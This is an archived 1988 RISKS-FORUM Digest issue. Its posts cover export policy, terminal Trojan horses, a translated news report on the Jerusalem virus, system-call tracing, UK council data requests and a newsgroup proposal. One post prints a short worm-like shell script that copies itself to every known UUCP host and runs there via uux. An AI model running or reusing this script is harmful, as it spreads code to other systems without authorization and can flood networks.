RISKS-LIST: RISKS-FORUM Digest Friday, 22 January 1988 Volume 6 : Issue 12 FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator Contents: Risks in technology transfer policy (Alan Wexelblat) Trojan-horsed smart terminals? (Tim McDaniel) The virus reaches Israel (Martin Minow) Checking for Trojan Horses and Viruses (Dennis L. Mumaugh) RISKS of uux(1) and trusting remote hosts (Abercrombie) Sheep, Goats, and responding to computer-generated requests (Martin Smith) Proposal for Fault Tolerance Newsgroup (Don Lee) The RISKS Forum is moderated. Contributions should be relevant, sound, in good taste, objective, coherent, concise, nonrepetitious. Diversity is welcome. Contributions to RISKS@CSL.SRI.COM, Requests to RISKS-Request@CSL.SRI.COM. For Vol i issue j, FTP SRI.COM, CD STRIPE:, GET RISKS-i.j. Volume summaries in (i, max j) = (1,46),(2,57),(3,92),(4,97),(5,85). ---------------------------------------------------------------------- Date: Tue, 19 Jan 88 14:48:17 CST From: Alan Wexelblat Subject: Risks in technology transfer policy One of the RISKS of technology is in attempts to control it. For the last seven years, the Reagan Administration has adopted an increasingly restrictive export licensing policy, aimed at reducing what they see as a problem of excessive technology transfer to East bloc countries. However, this policy and its implementation have their own risks. Recently, a National Academy of Sciences panel criticized the policy as "not generally perceived as rational, credible and predictable." One victim of this policy is Columbus Instruments, a small company located in Columbus, Ohio, which specializes in equipment used with animals in medical research labs. In June 1985, Dr. Jan Czekajewski, president of the company, shipped $228,000 worth of lab-animal research equipment to a medical symposium in Moscow. Included in the shipment were 5 personal computers, including a Taiwan-made PC-XT clone. Dr. Czekajewski didn't think he needed an export license. Under the Pentagon's Project Exodus, which was set up to stop shipment of strategic items to the Soviet bloc, US Customs agents seized the equipment at Kennedy Airport, descended on Czekajewski's offices, confiscated his files and notified television stations of the "critical leak of militarily sensitive technology" narrowly averted by the Customs Service. Czekajewski went to Eastern Europe to check the availability of microcomputers. He found the IBM PC-XT and AT computers available in Poland and in Bulgaria he bought a locally-made PC clone. After taking it back to Ohio, he discovered that he would need an export license to ship it back to Bulgaria! Two and a half years after the original raid, Czekajewski still doesn't have all his equipment back, and his battles with Customs and the Pentagon have cost him several hundred thousand dollars in legal fees, time, energy, and lost sales. Another victim is Alan Kay. He was invited by Gosplan, the Soviet central planning agency, to give a seminar in Moscow and describe how Gosplan could become more market-oriented. He wrote to the US Commerce Department and asked if any license was needed in order to describe software that he had designed which was commercially available in the US. He got a letter from Dan Haydosh, then acting director of the Office of Technology and Policy Analysis, indicating that the seminar would require an export license since it "presents a significant risk to our national security." Readers of the space digest know that many American companies are hurting because of the lack of launchers for commercial satellites; yet the government won't allow them to launch on Soviet rockets. Communications and weather tracking are both suffering as aging satellites break and can't be repaired or replaced. According to the National Academy of Sciences, the Reagan administration crackdown has essentially failed and is costing the US economy over $9 billion a year in lost trade. I frankly don't expect this to get better anytime sooner. Comments? --Alan Wexelblat UUCP: {harvard, gatech, pyramid, &c.}!sally!im4u!milano!wex ------------------------------ Date: Wed, 13 Jan 88 01:56:08 CST From: mcdaniel@uicsrd.csrd.uiuc.edu (Tim McDaniel) Subject: Trojan-horsed smart terminals? We just brought up BSD 4.3 (!) on our Vax. "finger" has been changed, so that a control character control-x is printed as "^X". (Actually, it doesn't come close to doing that, but that's beside the point.) The list of changes for 4.3 says that this was done to prevent Trojan horses. I assume that this refers to sending control sequences to very "smart" terminals. Tim McDaniel, Center for Supercomputing Research and Development at the University of Illinois at Urbana-Champaign Internet, BITNET: mcdaniel@uicsrd.csrd.uiuc.edu UUCP: {ihnp4,uunet,convex}!uiucuxc!uicsrd!mcdaniel CSNET: mcdaniel%uicsrd@uiuc.csnet [The bug of squirrelled CTL and ESC sequences was mentioned long ago in RISKS, and presumably has been fixed in most sensible systems! Of course, it still may lurk in non-mail contexts -- including FINGERing someone's Troajn PLAN. The FINGER vulnerability has not been mentioned explicitly, but is implicit in the earlier discussions. It is truly a Trojan horse, and even nastier than one contained in received mail -- it is triggered by curiosity on the part of the victim without action on the part of the perpetrator. By the way, the Christmas Tree "virus" (RISKS-5.79 ff.) is of course really a Trojan horse with an embedded virus. The ARF-ARF PC Graphics Trojan horse was also noted a while back. PGN] ------------------------------ From: minow%thundr.DEC@decwrl.dec.com (Martin Minow THUNDR::MINOW ML3-5/U26 223-9922) Date: 16 Jan 88 12:00 Subject: The virus reaches Israel [See RISKS-6.6] With Nitsan Duvduvani's (nitsan%tav02.dec@decwrl.dec.com) permission, I'm enclosing an article from an Israeli newspaper on the infamous virus. The article is translated by Nitsan, and was sent to me by Aharon Goldman (goldman%tav02.dec@decwrl.dec.com). I've lightly copy-edited it. Martin Minow [The following is translated from an article that appeared on "Maariv" (one of Israel's most popular daily newspapers) in 8-Jan-1988. I translated it myself, so I apologize for the poor style. My own comments appear in brackets '[]' within the translated text - Nitsan Duvduvani] THE 'COMPUTER AIDS' VIRUS CONTINUES TO RUN WILD: 'BEWARE OF FRIDAY THE 13-TH OF MAY' The Hebrew University [in Jerusalem] published this warning yesterday, as on the above date the virus may destroy any information found in the computer's memory or on the disks. Immunization programs are distributed to locate the virus and exterminate it. by Tal Shahaf The computer virus that got the nickname "the Israeli Virus" continues to run wild. The Hebrew University in Jerusalem spread the warning yesterday: Don't use your computer on Friday, the 13-th of May this year! On this day the virus was programmed to wake up from its hibernation - and destroy any information found in the computer memory or on the disks. Because of this reason, it also got the nickname "time bomb". Moreover, every 13-th of each month, the virus will cause a significant slow-down in the computer's response. Evidences were received by Maariv yesterday for the existence of the virus in many other places in addition to the Hebrew University in Jerusalem. It was also reported to be detected in one of the I.D.F. [Israeli Defense Forces] units using personal computers. Other messages mentioned some commercial companies where the virus had been detected. An owner of a software house from Tel-Aviv, who asked to remain anonymous, told that the malfunctions were detected in software kits that were bought with the computers and were installed by the selling company. Eli Shapira, an owner of a computer store from Haifa, tells about infected software kits that arrived at him from people in the area. The virus also infected a computer in his store, and possibly spread to customers who had bought software kits. According to him there was a thorough disinfection activity that cleared the computer and the diskettes in the store. Computer experts warn that the virus may now be in any software and in any computer, including those purchased in computer stores. Currently, the Hebrew University distributes immunization programs that can detect the virus in the computer's memory and exterminate it. A new problem popped up though: A mutation of the virus may show up, a few times as dangerous as the current virus. It all depends on the source of the virus and whether the person responsible for it is some computer wizard who did it for fun or some psychopath who does not control his actions. "THE ISRAELI VIRUS" SPREADS AT THE RATE OF AIDS The immunization programs fit only the virus from Jerusalem. Stopping of unauthorized software copying phenomenon is expected. by Tal Shahaf The model that fits the best the spreading of the computerized virus is the AIDS virus, so claim computer staff. The resemblance is in all dimensions. The spreading rate of the virus is amazing. A single infected diskette is sufficient for infecting thousands of personal computers. It is passed by diskettes going between computers, and also by telephone communication between computers. Yesterday it was found out that the virus was much wider spread than what was thought. Because of this reason, users are warned not to receive diskettes from unknown source. First precaution: not to use diskettes without the "computerized condom": a little sticker that prevents any damage to the information on the diskette. The computer community is grateful for stopping the process of unauthorized copying of software that reached incredible use lately. Exactly like AIDS, that generated the safe sex phenomenon, the computerized virus is about to generate the phenomenon of decent use only of software. The phenomenon of growing infected software was discovered yesterday as a side effect only. The real damage is the time bomb hidden: Every 13-th of each month, the virus will cause significant slow down in the computer response, and in 13-th of May this year it will erase all the information in the computer. Yuval Rahavi, the computer expert from Jerusalem who discovered the vicious virus, explains that it is a small and sophisticated computer program. When the computer is turned on, the program is loaded into the computer memory, and from now on, any program invoked is contaminated. When the virus identifies a new program, it joins it without disturbing its activity. From now on, any use of this software, transferring it to other user, will spread the virus. The temporary solution to the problem is the immunization programs written by Rahavi. One is used to detect the virus and the other for prevention. It is loaded into the computer memory before any other software. If the virus then attempts to reside in the memory, the program will give appropriate warning. People from the Hebrew University distributed information that described the virus for all the computer users at the universities, joined with copies of the immunization programs. Ofer Ahituv, an owner of a software house, thinks the source for the virus is in one of the software houses which became involved with his programmers. According to him, all his software kits will now be distributed carrying a label specifying they were checked and found clean of any virus. The possibility of a new virus, which is more dangerous, scares computer people. Such a virus may harm the information, erase it slowly in such a way that is not detectable. This way, accountants may find out all their clients accounting data has been erased, banks will lose their customers data, stores - their cash register data. The immunization programs are good for fighting the current virus. If a new virus pops up - these immunizations will be worthless. Ezra Ben-Kohav, chairman of the computer organization I.O.I.P. [Israeli Organization for Information Processing] told Maariv yesterday: "There is no law that defined such action as crime. If the author is caught, there will be nothing to blame him/her for." Arie Bender gives the following message: A search team was established in the Hebrew University, which includes Hilel Bar-Dayan, Amiram Ofir, Eli Peled and Elisha Ben-Ezra. People in the university asked yesterday to make clear there was no information or suspicion about the creators of the virus, including students of the Talpiot program [a special program for young students that combines army studying]. THIS IS HOW TO PROTECT YOUR COMPUTER Yossi Gil, from the computer people who discovered the virus, suggests several defense activities for the computer users who receive a new diskette and want to check it. 1. During the check, activate the computer without a hard disk that may be infected by the virus. 2. Use diskettes that carry no important information/programs. 3. Invoke the checked software with a diskette protected by a sticker. 4. Invoke the software again with a diskette without a sticker. 5. Compare the two diskettes using a compare program. If no differences are found, you may assume the checked diskette is free of the virus. 6. Another rule which is always important: Prepare a copy of any important diskette, and specify the date when the copy was done. If the virus attacks your computer, you will be able to restore the damaged programs from these copies. (by Tal Shahaf) THE VIRUS REACHED HAIFA The "Israeli virus" was detected, after causing much damage, also in the educational center of the ministry of education in Rotenberg building on the Carmel [mountain in Haifa]. There is a computer project going on this site, in which tens of students participate. The center manager, Gideon Goldstein, and the project people Michael Hazan and Gadi Kats, told that 6 weeks ago there was a virus discovered, which destroyed 15 thousand dollars worth of software and 2 disks in which 7000 hours of work had been invested, in an irrecoverable way. (by Reuven Ben-Zvi) PANIC AMONG OWNERS OF PERSONAL COMPUTERS The Israeli virus panic moved from within the campus and spread out also to the computer consumers in Jerusalem. In many stores there were customers reporting symptoms in their home computers, that matched those which had been found in the P.C. systems in the university. "This morning we ran into and heard about a few cases", told Emanuel Marinsky, manager of computer services lab, "It raises panic". (by Arie Bender) ------------------------------ Date: Thu, 7 Jan 88 18:02:04 est From: moss!cuuxb!dlm@RUTGERS.EDU Subject: Checking for Trojan Horses and Viruses -- a partial solution In the latest discussions there has been some thought as to how to prevent viruses and Trojan horses ... I am now using an internal product called "truss" that inolves the "proc" file system of UNIX Version 8 (and other developemental versions). Truss is a system call tracer. It allows one to examine any process and observe all system calls. It lists the system call, and the arguments. This is done intelligently with translations of arguments to strings and human format data. It also gives the return value of the call and translates error codes into symbolics. With this product one can watch the behavior of a program and observe what it does (in a gross level) and who or what it operates on. Truss is able to handle the fork/exec of UNIX and follow the children processes (limited recursion). Thus one can attach truss to a login shell and watch a terminal session of a suspect. Also truss can attach to a process under execution and not related to the initiator. Truss can also freeze the process in its tracks and allow another product (a debugger) more initimate access to the errant process. The utility as a systems security device AFTER inital suspicion is raised is obvious. The RISK? Applying this to MY operations. After all who is to determine what a virus is? Dennis L. Mumaugh Lisle, IL ...!{attunix,ihnp4,cbosgd,lll-crg}!cuuxb!dlm [There is also the problem of locking the barn door after the Trojan horse has escaped. Baled out? A Trojan cake hidden in a file instead of a file hidden in the cake? PGN] ------------------------------ From: sdsu!Abercrombie%minas-morgul.csa.com@sdcsvax.ucsd.edu Date: Wed, 6 Jan 88 23:37:55 GMT To: RISKS@csl.sri.com Subject: RISKS of uux(1) and trusting remote hosts There has been much talk recently about viruses and other malevolent programs. I will add just one more to the discussion. It is well known that the UNIX operating system is not very secure -- it is also well known that there are many thousands of UNIX machines in place. The following program owes its operation to the uucp(1) and uux(1) commands. On most sane systems, the execution of commands using uux is restricted. But, by contacting every system known to the current host, it is very likely that some of the system managers have forgotten to plug this simple hole. There are similar holes that command restriction does not plug, but it would be a mistake to illucidate further. I do not advocate that you execute the following program. It is meant for expository puposes only. However, it does not contain any harmful commands except perhaps that it could flood the network indefinitely. In closing I would remind everyone that when you connect one machine to another there is a degree of trust involved. Many a system has been un-done by trusting an untrustworthy system -- a simple example would be a faculty machine connected to a machine accessible to students and have the student machine mentioned in the /etc/hosts.equiv file. -- CUT -- # # A very simple virus. # for x in `uuname` do uucp -C /tmp/virus $x\!/tmp/virus uux $x\!"sh -c /tmp/virus" done rm -f /tmp/virus ------------------------------ Date: 17 Jan 1988 20:38:14 GMT From: MartinSm Subject: Sheep, Goats, and responding to computer-generated requests I don't know how these things work in America but over here forms are sent out each year to register to vote in elections and by law they *MUST* be completed. This year another form was sent out in the same envelope, computer printed and requesting information such as the number of people in the house of 'Ethnic Origin' or Unemployed or Disabled. Nowhere on the form did it say that it was nothing to do with the electoral register and had no legal status. It had been issued by our local council (Leeds) and contained a suspicious looking code number in the corner which could be used to discover which household had filled it in. Though no address was printed which would have made this obvious. Naturally the form went in the bin immediately. A couple of weeks later a letter arrived saying in essence that we had been *RANDOMLY* chosen from a *SMALL* number of people who were being uncooperative. We were to be visited by someone who was going to get us to fill it in. As yet this has not occurred but if it does they are not getting past the door. The situation becomes more interesting when you know that there was a scandal involving council officers writing to department heads and asking for their master passwords. This information was usually provided, on the pre-printed form, without question. This is the "sheep" factor again. It seems to be becoming increasingly common for people to request information for nefarious, nonessential or unexplained reasons. I think we have a lot to worry about. Especially in a country like the UK where it is much easier to put data into officials' hands than to get it out of them. Martin Smith, Langwith College, University Of York, Heslington, York, YO1 5DD England ------------------------------ From: trwrb!dlee@aero.arpa (Don Lee) Subject: Proposal for Fault Tolerance Newsgroup Date: 5 Jan 88 21:41:00 GMT Reply-To: trwrb!aero!dlee@ucbvax.Berkeley.EDU (Don Lee) Organization: The Aerospace Corporation, El Segundo, CA I would like to propose the formation of a new newsgroup, comp.fault_tolerance, that would discuss technical issues releated to fault tolerance. Such a newsgroup is needed, since there is no current newsgroup that discusses the technical issues involved in fault-tolerant computing. Fault tolerance is an extremely diversified area of computing that is not only concerned with hardware and software, but also with, to name a few, interconnection networks, real-time systems, parallel and alternative architectures, and data base systems. Issues also involve modeling (including automated reliability models such as CARE III, HARP, ARIES, and CRAFTS) and simulation of fault-tolerant systems. Since fault-tolerant computing is such a diversified area it is easy to imagine that such a large volume of articles would be posted that the average reader would have a difficult time keeping up. Therefore, the newsgroup should be moderated. I am willing to be the group moderator. If anyone has any comments regarding the name and nature of the group please post them to news.groups. I will answer them as soon as possible. Please send any votes for or against the group to me personally. I hope that the group will be formed very shortly, and I look forward to the interesting and informative articles that I am sure will be posted to comp.fault_tolerance. Thank you, Don Lee ------------------------------ End of RISKS-FORUM Digest ************************